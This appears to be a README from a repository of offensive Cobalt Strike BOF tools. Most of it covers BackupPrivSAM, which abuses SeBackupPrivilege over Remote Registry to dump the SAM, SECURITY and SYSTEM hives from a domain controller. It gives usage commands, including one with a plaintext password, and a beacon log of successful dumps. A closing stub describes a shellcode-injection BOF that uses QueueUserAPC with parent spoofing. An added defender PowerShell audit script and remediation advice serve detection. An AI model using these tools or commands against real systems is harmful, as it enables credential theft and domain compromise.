A basic implementation of abusing the SeBackupPrivilege via Remote Registry
to dump the SAM, SECURITY and SYSTEM hives of a remote machine.
Inspired by the initial PoC from https://twitter.com/filip_dragovic; this just turns it into a BOF.
Could be improved to automatically download the dumped hives. CBA.
Usage:
BackupPrivSAM [\\computername] [save path] (optional: [domain] [username] [password])

Dump the hives to the remote C:\ drive, using the current primary token:
BackupPrivSAM \\dc01.contoso.local C:\

Dump the hives to the remote C:\ drive, impersonating the given user:
BackupPrivSAM \\dc01.contoso.local C:\ CONTOSO backup_service Password123
beacon> backupPrivSAM \\cdc001.corp.contoso.local C:\ CORP backup_service *************
[*] Launching backupPrivSAM...
[+] host called home, sent: 2589 bytes
[+] received output:
Got Credentials. Making Token...
[+] received output:
Impersonated user: CORP\backup_service
[+] received output:
Will try to dump SAM from \\cdc001.corp.contoso.local\HKLM\ into folder 'C:\'
[+] received output:
Connecting to remote registry of '\\cdc001.corp.contoso.local'
[+] received output:
RegConnectRegistryW() - OK
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SAM hive to C:\SAM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SYSTEM hive to C:\SYSTEM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SECURITY hive to C:\SECURITY
beacon> ls \\cdc001\C$
[*] Tasked beacon to list files in \\cdc001\C$
[+] host called home, sent: 29 bytes
[*] Listing: \\cdc001\C$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 04/29/2019 01:27:26 $Recycle.Bin
dir 04/27/2019 16:32:36 Documents and Settings
dir 05/05/2019 17:53:11 PerfLogs
dir 11/20/2019 11:30:27 Program Files
dir 04/28/2019 17:45:56 Program Files (x86)
dir 08/17/2021 21:09:38 ProgramData
dir 04/27/2019 16:32:36 Recovery
dir 04/28/2019 17:46:10 System Volume Information
dir 04/29/2019 01:26:56 Users
dir 10/02/2021 19:27:55 Windows
380kb fil 11/21/2016 00:42:45 bootmgr
1b fil 07/16/2016 14:18:08 BOOTNXT
1gb fil 07/19/2022 17:45:55 pagefile.sys
52kb fil 07/23/2022 21:23:45 SAM
32kb fil 07/23/2022 21:23:45 SECURITY
17mb fil 07/23/2022 21:23:45 SYSTEM
beacon> make_token CORP\backup_service **********
[*] Tasked beacon to create a token for CORP\backup_service
[+] host called home, sent: 59 bytes
[+] Impersonated CORP\Administrator
beacon> backupPrivSAM \\cdc001.corp.contoso.local C:\
[*] Launching backupPrivSAM...
[+] host called home, sent: 2511 bytes
[+] received output:
Will try to dump SAM from \\cdc001.corp.contoso.local\HKLM\ into folder 'C:\'
[+] received output:
Connecting to remote registry of '\\cdc001.corp.contoso.local'
[+] received output:
RegConnectRegistryW() - OK
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SAM hive to C:\SAM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SYSTEM hive to C:\SYSTEM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SECURITY hive to C:\SECURITY
beacon> ls \\cdc001\C$
[*] Tasked beacon to list files in \\cdc001\C$
[+] host called home, sent: 29 bytes
[*] Listing: \\cdc001\C$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 04/29/2019 01:27:26 $Recycle.Bin
dir 04/27/2019 16:32:36 Documents and Settings
dir 05/05/2019 17:53:11 PerfLogs
dir 11/20/2019 11:30:27 Program Files
dir 04/28/2019 17:45:56 Program Files (x86)
dir 08/17/2021 21:09:38 ProgramData
dir 04/27/2019 16:32:36 Recovery
dir 04/28/2019 17:46:10 System Volume Information
dir 04/29/2019 01:26:56 Users
dir 10/02/2021 19:27:55 Windows
380kb fil 11/21/2016 00:42:45 bootmgr
1b fil 07/16/2016 14:18:08 BOOTNXT
1gb fil 07/19/2022 17:45:55 pagefile.sys
52kb fil 07/23/2022 21:24:06 SAM
32kb fil 07/23/2022 21:24:07 SECURITY
17mb fil 07/23/2022 21:24:07 SYSTEM
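As an added defender-side example (not code from the BOF project or its author), the following PowerShell script audits a Windows host for the two preconditions the technique above depends on, an account holding SeBackupPrivilege and a reachable Remote Registry service, and for the artifact the transcript shows it leaving behind: plain files named SAM, SECURITY and SYSTEM written to the root of a drive. It assumes an elevated PowerShell 5.1 or later session on the host being checked; the function names are the example's own.

```powershell
# Added example, not part of the BOF project on this page.
# Assumes: elevated PowerShell 5.1+ session on the host being audited.

function Get-SeBackupPrivilegeHolders {
    # secedit exports the effective user-rights assignment; the line of interest looks like
    #   SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
    $cfg = Join-Path $env:TEMP ("userrights_{0}.inf" -f [guid]::NewGuid())
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    try {
        $line = Get-Content -Path $cfg | Where-Object { $_ -match '^SeBackupPrivilege\s*=' }
        if (-not $line) { return @() }
        $entries = (($line -split '=', 2)[1]).Trim() -split ','
        foreach ($entry in $entries) {
            $entry = $entry.Trim()
            if ($entry.StartsWith('*')) {
                # '*'-prefixed entries are SIDs; translate to an account name where possible.
                $sid = New-Object System.Security.Principal.SecurityIdentifier($entry.Substring(1))
                try { $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $entry }
            } else {
                $entry
            }
        }
    } finally {
        Remove-Item -Path $cfg -ErrorAction SilentlyContinue
    }
}

function Get-RemoteRegistryState {
    # The RegConnectRegistryW() call seen in the transcript only succeeds when this service answers.
    $svc = Get-Service -Name RemoteRegistry -ErrorAction SilentlyContinue
    if (-not $svc) { return 'not present' }
    return ('{0} (StartType: {1})' -f $svc.Status, $svc.StartType)
}

function Find-DumpedHiveFiles {
    # The tool saves the hives as files named SAM, SECURITY and SYSTEM in the chosen
    # save path; the transcript uses the drive root, so check the root of every drive.
    $hits = @()
    foreach ($drive in Get-PSDrive -PSProvider FileSystem) {
        foreach ($name in 'SAM', 'SECURITY', 'SYSTEM') {
            $candidate = Join-Path $drive.Root $name
            if (Test-Path -Path $candidate -PathType Leaf) {
                $hits += Get-Item -Path $candidate | Select-Object FullName, Length, LastWriteTime
            }
        }
    }
    return $hits
}

# Report the findings.
Write-Host 'Accounts holding SeBackupPrivilege:'
Get-SeBackupPrivilegeHolders | ForEach-Object { Write-Host "  $_" }

Write-Host "Remote Registry service: $(Get-RemoteRegistryState)"

# On a member server or workstation, list who is actually in Backup Operators.
# On a domain controller (the transcript targets one) Backup Operators is a domain
# group instead; use Get-ADGroupMember 'Backup Operators' from the ActiveDirectory module.
$members = Get-LocalGroupMember -Group 'Backup Operators' -ErrorAction SilentlyContinue
if ($members) {
    Write-Host 'Local Backup Operators members:'
    $members | ForEach-Object { Write-Host "  $($_.Name)" }
}

$dumped = Find-DumpedHiveFiles
if ($dumped) {
    Write-Host 'Hive-named files found at a drive root (review these):'
    $dumped | Format-Table -AutoSize | Out-String | Write-Host
} else {
    Write-Host 'No SAM/SECURITY/SYSTEM files found at drive roots.'
}
```

Two remediation points follow from the output: membership in Backup Operators (or any other grant of SeBackupPrivilege) should be limited to accounts that really perform backups, and the Remote Registry service can be left stopped and disabled on hosts that do not need it, which removes the RegConnectRegistryW() path the tool relies on.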
queueuserapc_ppid/
This BOF spawns a process of your choice under a specified parent process and injects the shellcode read from a provided file via QueueUserAPC().